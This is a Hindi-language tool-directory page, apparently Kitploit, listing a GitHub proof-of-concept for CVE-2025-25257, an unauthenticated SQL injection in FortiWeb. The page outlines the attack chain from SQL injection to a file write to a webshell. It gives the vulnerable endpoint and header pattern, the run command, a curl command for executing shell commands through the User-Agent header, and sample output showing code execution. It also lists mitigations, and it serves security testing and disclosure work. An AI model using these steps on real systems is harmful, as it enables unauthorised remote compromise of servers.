Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-25257 — CVE-2025-25257 के लिए PoC, FortiWeb में एक गंभीर बिना प्रमाणीकरण के SQL इंजेक्शन। Authorization हेडर के माध्यम से SQLi का शोषण करके वेबशेल लिखता है और RCE प्राप्त करता है। लॉगिन आवश्यक नहीं। पूरी तरह से स्वचालित। | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2025-25257
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHub0xgh057r3c0n/cve-2025-25257

CVE-2025-25257

CVE-2025-25257 के लिए PoC, FortiWeb में एक गंभीर बिना प्रमाणीकरण के SQL इंजेक्शन। Authorization हेडर के माध्यम से SQLi का शोषण करके वेबशेल लिखता है और RCE प्राप्त करता है। लॉगिन आवश्यक नहीं। पूरी तरह से स्वचालित।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2025-25257 – FortiWeb SQLi से RCE

महत्वपूर्ण SQL इंजेक्शन → वेबशेल निष्पादन

0xgh057r3c0n द्वारा खोजा और शस्त्रीकृत किया गया


🧠 कमज़ोरी अवलोकन

CVE-2025-25257 FortiWeb सिस्टम को प्रभावित करता है जो /api/fabric/device/status एंडपॉइंट को उजागर करता है, जो Authorization हेडर इनपुट को ठीक से सैनिटाइज़ करने में विफल रहता है।

एक हमलावर सर्वर पर वेबशेल लिखने और दूरस्थ रूप से कमांड निष्पादित करने के लिए बिना प्रमाणीकरण के SQL इंजेक्शन कर सकता है।


💥 हमला प्रवाह

root@kitploit:~
SQL Injection ➜ SQL INTO OUTFILE ➜ Python chmod Gadget ➜ Trigger ➜ Webshell RCE

📍 कमज़ोर एंडपॉइंट

root@kitploit:~
GET /api/fabric/device/status
Header: Authorization: Bearer ';<SQLi>

🔓 शोषण विशेषताएँ

  • Bearer टोकन के माध्यम से SQLi
  • शेल ड्रॉप करने के लिए SQL INTO OUTFILE
  • Python हुक chmod को ट्रिगर करता है
  • User-Agent के माध्यम से कमांड निष्पादित किए जाते हैं
  • पूरी तरह से स्वचालित PoC

🧪 उपयोग

root@kitploit:~
python3 CVE-2025-25257.py -t https://target-host.com

तब:

root@kitploit:~
curl -k -H "User-Agent: whoami" https://target-host.com/cgi-bin/x.cgi

🔧 आवश्यकताएँ

  • Python 3.6+
  • requests मॉड्यूल

इंस्टॉल करें:

root@kitploit:~
pip install requests

📤 नमूना आउटपुट

root@kitploit:~
[*] Writing Webshell Chunk: #!/bin/sh ...
[>] Exporting Webshell to File...
[*] Writing Chmod Gadget Chunk: import os ...
[>] Triggering chmod via Python Hook...
[*] Executing `id` via Webshell...
uid=33(www-data) gid=33(www-data)

[+] Webshell Ready:
    > https://target-host.com/cgi-bin/x.cgi
    > Send commands via User-Agent header

📊 CVSS अनुमान

मीट्रिकमान
आधार स्कोर9.8 (गंभीर)
हमला वेक्टरनेटवर्क
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता संपर्ककोई नहीं

🛡️ शमन

  • FortiWeb फर्मवेयर अपडेट करें (यदि पैच उपलब्ध हो)
  • सभी हेडर इनपुट को सैनिटाइज़ करें
  • फ़ाइल लिखने के पथ और CGI निष्पादन को प्रतिबंधित करें

👨‍💻 लेखक

0xgh057r3c0n 🔗 github.com/0xgh057r3c0n


⚠️ अस्वीकरण

यह प्रमाण-अवधारणा केवल शैक्षिक और अधिकृत परीक्षण के लिए है। अपने जोखिम पर उपयोग करें। लेखक दुरुपयोग के लिए जिम्मेदार नहीं है।


टूल डाउनलोड करें
प्रभावउच्च (C/I/A)